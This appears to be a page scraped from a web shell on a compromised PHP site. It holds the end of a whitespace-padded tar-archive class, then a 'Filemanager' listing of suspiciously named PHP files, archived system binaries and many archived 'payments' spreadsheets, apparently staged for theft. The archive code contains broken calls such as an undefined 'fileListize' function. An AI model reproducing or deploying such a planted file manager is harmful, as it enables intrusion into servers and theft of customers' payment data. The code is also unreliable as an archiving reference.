             
	                    	                    	                    	                    	                    fclose($destination);
               
	                    	                    	                    	                    	                    touch($header['filename'], $header['time']);
	                    	                    	                    	                    }
	                    	                    	                    	                    clearstatcache();
                
	                    	                    	                    	                    if (fileListize($header['filename']) != $header['size']) {

	                    	                    	                    	                    	                    $this->eventErrors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect');

	                    	                    	                    	                    	                    return false;

	                    	                    	                    	                    }
	                    	                    	                    }
	                    	                    	                    if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = '';
               
	                    	                    	                    if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';

	                    	                    	                    $this->dirs[] = $file_dir;

	                    	                    	                    $this->fileList[] = $header['filename'];

	                    

	                    	                    }

	                    	                    return true;

	                    }


                    
	                    function dirCheck($dir){
               
	                    	                    $parent_dir = dirname($dir);
                


	                    	                    if ((@is_dir($dir)) or ($dir == ''))

	                    	                    	                    return true;

	                    	                    if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))
               
	                    	                    	                    return false;


	                    	                    if (!mkdir($dir, 0777)){

	                    	                    	                    $this->eventErrors[] = __('Cannot create directory').' '.$dir;

	                    	                    	                    return false;
            
	                    	                    }
	                    	                    return true;

	                    }


	                    function readFileHeader($binaryData, &$header){
                   
	                    	                    if (strlen($binaryData)==0){
          
	                    	                    	                    $header['filename'] = '';

	                    	                    	                    return true;
                
	                    	                    }
                  

            
	                    	                    if (strlen($binaryData) != 512){
	                    	                    	                    $header['filename'] = '';

	                    	                    	                    $this->__('Invalid block size').': '.strlen($binaryData);

	                    	                    	                    return false;

	                    	                    }

        
	                    	                    $fileIntegrityCheck = 0;
                
	                    	                    for ($i = 0; $i < 148; $i++) $fileIntegrityCheck+=ord(substr($binaryData, $i, 1));

	                    	                    for ($i = 148; $i < 156; $i++) $fileIntegrityCheck += ord(' ');
	                    	                    for ($i = 156; $i < 512; $i++) $fileIntegrityCheck+=ord(substr($binaryData, $i, 1));
                


	                    	                    $unpack_data = unpack('a100filename/a8mode/a8userIdentifier/a8group_id/a12size/a12time/a8fileIntegrityCheck/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);


          
	                    	                    $header['fileIntegrityCheck'] = OctDec(trim($unpack_data['fileIntegrityCheck']));
          
	                    	                    if ($header['fileIntegrityCheck'] != $fileIntegrityCheck){
	                    	                    	                    $header['filename'] = '';

	                    	                    	                    if (($fileIntegrityCheck == 256) && ($header['fileIntegrityCheck'] == 0)) 	                    return true;
	                    	                    	                    $this->eventErrors[] = __('Error fileIntegrityCheck for file ').$unpack_data['filename'];
              
	                    	                    	                    return false;

	                    	                    }


                
	                    	                    if (($header['typeflag'] = $unpack_data['typeflag']) == '5')	                    $header['size'] = 0;

	                    	                    $header['filename'] = trim($unpack_data['filename']);
           
	                    	                    $header['mode'] = OctDec(trim($unpack_data['mode']));
             
	                    	                    $header['userIdentifier'] = OctDec(trim($unpack_data['userIdentifier']));
	                    	                    $header['group_id'] = OctDec(trim($unpack_data['group_id']));
	                    	                    $header['size'] = OctDec(trim($unpack_data['size']));
	                    	                    $header['time'] = OctDec(trim($unpack_data['time']));
	                    	                    return true;
                   
	                    }
                 




                        

        
	                    function writeFileHeader($filename, $keep_filename){

	                    	                    $packF = 'a100a8a8a8a12A12';
	                    	                    $packL = 'a1a100a6a2a32a32a8a8a155a12';
	                    	                    if (strlen($keep_filename)<=0) $keep_filename = $filename;
         
	                    	                    $filename_ready = $this->createValidPath($keep_filename);


             
	                    	                    if (strlen($filename_ready) > 99){	                    	                    	                    	                    	                    	                    	                    //write long header
                   
	                    	                    $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);

	                    	                    $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');
               


        //  Calculate the fileIntegrityCheck

	                    	                    $fileIntegrityCheck = 0;

        //  First part of the header

	                    	                    for ($i = 0; $i < 148; $i++)
         
	                    	                    	                    $fileIntegrityCheck += ord(substr($dataFirst, $i, 1));

        //  Ignore the fileIntegrityCheck value and replace it by ' ' (space)

	                    	                    for ($i = 148; $i < 156; $i++)
        
	                    	                    	                    $fileIntegrityCheck += ord(' ');
        //  Last part of the header
                
	                    	                    for ($i = 156, $j=0; $i < 512; $i++, $j++)
                 
	                    	                    	                    $fileIntegrityCheck += ord(substr($dataLast, $j, 1));

        //  Write the first 148 bytes of the header in the archive
               
	                    	                    $this->writeFileBlock($dataFirst, 148);
        //  Write the calculated fileIntegrityCheck
                 
	                    	                    $fileIntegrityCheck = sprintf('%6s ', DecOct($fileIntegrityCheck));
	                    	                    $binaryData = pack('a8', $fileIntegrityCheck);
	                    	                    $this->writeFileBlock($binaryData, 8);

        //  Write the last 356 bytes of the header in the archive

	                    	                    $this->writeFileBlock($dataLast, 356);
             

	                    	                    $temporaryFilename = $this->createValidPath($filename_ready);

	                    	                    $i = 0;
                
	                    	                    	                    while (($buffer = substr($temporaryFilename, (($i++)*512), 512)) != ''){
                  
	                    	                    	                    	                    $binaryData = pack('a512', $buffer);
	                    	                    	                    	                    $this->writeFileBlock($binaryData);
	                    	                    	                    }

	                    	                    return true;
               
	                    	                    }

	                    	                    $file_info = stat($filename);
	                    	                    if (@is_dir($filename)){

	                    	                    	                    $typeflag = '5';

	                    	                    	                    $size = sprintf('%11s ', DecOct(0));
                    
	                    	                    } else {
	                    	                    	                    $typeflag = '';

	                    	                    	                    clearstatcache();
	                    	                    	                    $size = sprintf('%11s ', DecOct(fileListize($filename)));
	                    	                    }

	                    	                    $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));

	                    	                    $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
           
	                    	                    $fileIntegrityCheck = 0;

	                    	                    for ($i = 0; $i < 148; $i++) $fileIntegrityCheck += ord(substr($dataFirst, $i, 1));
	                    	                    for ($i = 148; $i < 156; $i++) $fileIntegrityCheck += ord(' ');

	                    	                    for ($i = 156, $j = 0; $i < 512; $i++, $j++) $fileIntegrityCheck += ord(substr($dataLast, $j, 1));

	                    	                    $this->writeFileBlock($dataFirst, 148);
	                    	                    $fileIntegrityCheck = sprintf('%6s ', DecOct($fileIntegrityCheck));

	                    	                    $binaryData = pack('a8', $fileIntegrityCheck);
	                    	                    $this->writeFileBlock($binaryData, 8);

	                    	                    $this->writeFileBlock($dataLast, 356);
	                    	                    return true;
	                    }
              

	                    function startWriteProcess(){

	                    	                    if ($this->isCompressed)

	                    	                    	                    $this->temporaryFile = gzopen($this->archiveIdentifier, 'wb9f');

	                    	                    else

	                    	                    	                    $this->temporaryFile = fopen($this->archiveIdentifier, 'wb');
           

	                    	                    if (!($this->temporaryFile)){

	                    	                    	                    $this->eventErrors[] = __('Cannot write to file').' '.$this->archiveIdentifier;
	                    	                    	                    return false;

	                    	                    }
               
	                    	                    return true;
	                    }
          


	                    function readFileBlock(){
                  
	                    	                    if (is_resource($this->temporaryFile)){

	                    	                    	                    if ($this->isCompressed)

	                    	                    	                    	                    $block = gzread($this->temporaryFile, 512);
	                    	                    	                    else

	                    	                    	                    	                    $block = fread($this->temporaryFile, 512);

	                    	                    } else	                    $block = '';



	                    	                    return $block;

	                    }


          
	                    function writeFileBlock($data, $length = 0){
            
	                    	                    if (is_resource($this->temporaryFile)){
        
	                    	                    

	                    	                    	                    if ($length === 0){

	                    	                    	                    	                    if ($this->isCompressed)
                
	                    	                    	                    	                    	                    gzputs($this->temporaryFile, $data);
	                    	                    	                    	                    else
             
	                    	                    	                    	                    	                    fputs($this->temporaryFile, $data);

	                    	                    	                    } else {

	                    	                    	                    	                    if ($this->isCompressed)
        
	                    	                    	                    	                    	                    gzputs($this->temporaryFile, $data, $length);

	                    	                    	                    	                    else

	                    	                    	                    	                    	                    fputs($this->temporaryFile, $data, $length);
               
	                    	                    	                    }

	                    	                    }
	                    }
          


	                    function closeTemporaryFile(){

	                    	                    if (is_resource($this->temporaryFile)){

	                    	                    	                    if ($this->isCompressed)
	                    	                    	                    	                    gzclose($this->temporaryFile);

	                    	                    	                    else

	                    	                    	                    	                    fclose($this->temporaryFile);


	                    	                    	                    $this->temporaryFile = 0;
	                    	                    }

	                    }


	                    function createValidPath($path){
	                    	                    if (strlen($path)>0){

	                    	                    	                    $path = str_replace('\\', '/', $path);
	                    	                    	                    $partPath = explode('/', $path);

	                    	                    	                    $els = count($partPath)-1;
         
	                    	                    	                    for ($i = $els; $i>=0; $i--){
	                    	                    	                    	                    if ($partPath[$i] == '.'){
                 
                    //  Ignore this directory

                } elseif ($partPath[$i] == '..'){
        
                    $i--;
                }

	                    	                    	                    	                    elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){

                }	                    else
	                    	                    	                    	                    	                    $result = $partPath[$i].($i!=$els ? '/'.$result : '');
	                    	                    	                    }

	                    	                    } else $result = '';
	                    	                    
	                    	                    return $result;

	                    }

}

?>

Filemanager

Name Type Size Permission Actions
apt.zip File 1008.64 KB 0644
arptables-nft-restore.tar File 221 KB 0644
arptables-nft-restore.tar.gz File 91.05 KB 0644
f8lo32.tar File 741 KB 0644
f8lo32.tar.gz File 219.17 KB 0644
git-core.zip File 8.81 MB 0644
gp9r4.php File 146.96 KB 0644
gp9r4.php.tar File 148.5 KB 0644
init.tar File 1.77 MB 0644
init.tar.gz File 621.25 KB 0644
init.zip File 8.07 KB 0644
ip6tables-legacy-restore.tar File 98.5 KB 0644
ip6tables-legacy-restore.tar.gz File 36.25 KB 0644
ip6tables-nft-restore.tar File 221 KB 0644
ip6tables-nft-restore.tar.gz File 91.05 KB 0644
ip6tables-restore-translate.tar File 221 KB 0644
ip6tables-restore-translate.tar.gz File 91.06 KB 0644
ip6tables-save.tar File 221 KB 0644
ip6tables-save.tar.gz File 91.04 KB 0644
nxepl1.tar File 186 KB 0644
nxepl1.tar.gz File 41.11 KB 0644
payments 2025-05-28 15-23-40.xlsx.tar File 8.5 KB 0644
payments 2025-05-28 15-23-40.xlsx.xlsx.tar.gz File 6.15 KB 0644
payments 2025-05-28 15-24-23.xlsx.tar File 8.5 KB 0644
payments 2025-05-28 15-24-23.xlsx.xlsx.tar.gz File 6.16 KB 0644
payments 2025-05-28 15-32-07.xlsx.tar File 8.5 KB 0644
payments 2025-05-28 15-32-07.xlsx.xlsx.tar.gz File 6.16 KB 0644
payments 2025-05-29 03-55-40.xlsx.tar File 8.5 KB 0644
payments 2025-05-29 03-55-40.xlsx.xlsx.tar.gz File 6.16 KB 0644
payments 2025-05-30 07-55-52.xlsx.tar File 9 KB 0644
payments 2025-05-30 07-55-52.xlsx.xlsx.tar.gz File 6.44 KB 0644
payments 2025-05-30 07-59-34.xlsx.tar File 9 KB 0644
payments 2025-05-30 07-59-34.xlsx.xlsx.tar.gz File 6.44 KB 0644
payments 2025-07-16 13-57-11.xlsx.tar File 8.5 KB 0644
payments 2025-07-16 13-57-11.xlsx.xlsx.tar.gz File 6.32 KB 0644
payments 2025-07-16 14-04-06.xlsx.tar File 9.5 KB 0644
payments 2025-07-16 14-04-06.xlsx.xlsx.tar.gz File 7.3 KB 0644
payments 2025-07-16 15-16-08.xlsx.tar File 9.5 KB 0644
payments 2025-07-16 15-16-08.xlsx.xlsx.tar.gz File 7.3 KB 0644
payments 2025-07-18 12-09-36.xlsx.tar File 10 KB 0644
payments 2025-07-18 12-09-36.xlsx.xlsx.tar.gz File 7.9 KB 0644
payments 2025-07-18 12-09-53.xlsx.tar File 10 KB 0644
payments 2025-07-18 12-09-53.xlsx.xlsx.tar.gz File 7.9 KB 0644
payments 2025-08-01 07-45-11.xlsx.tar File 9.5 KB 0644
payments 2025-08-01 07-45-11.xlsx.xlsx.tar.gz File 7 KB 0644
payments 2025-08-01 09-00-13.xlsx.tar File 9.5 KB 0644
payments 2025-08-01 09-00-13.xlsx.xlsx.tar.gz File 7 KB 0644
update-java-alternatives.tar File 5 KB 0644
update-java-alternatives.tar.gz File 1.21 KB 0644
vgimportclone.tar File 2.89 MB 0644
vgimportclone.tar.gz File 932.16 KB 0644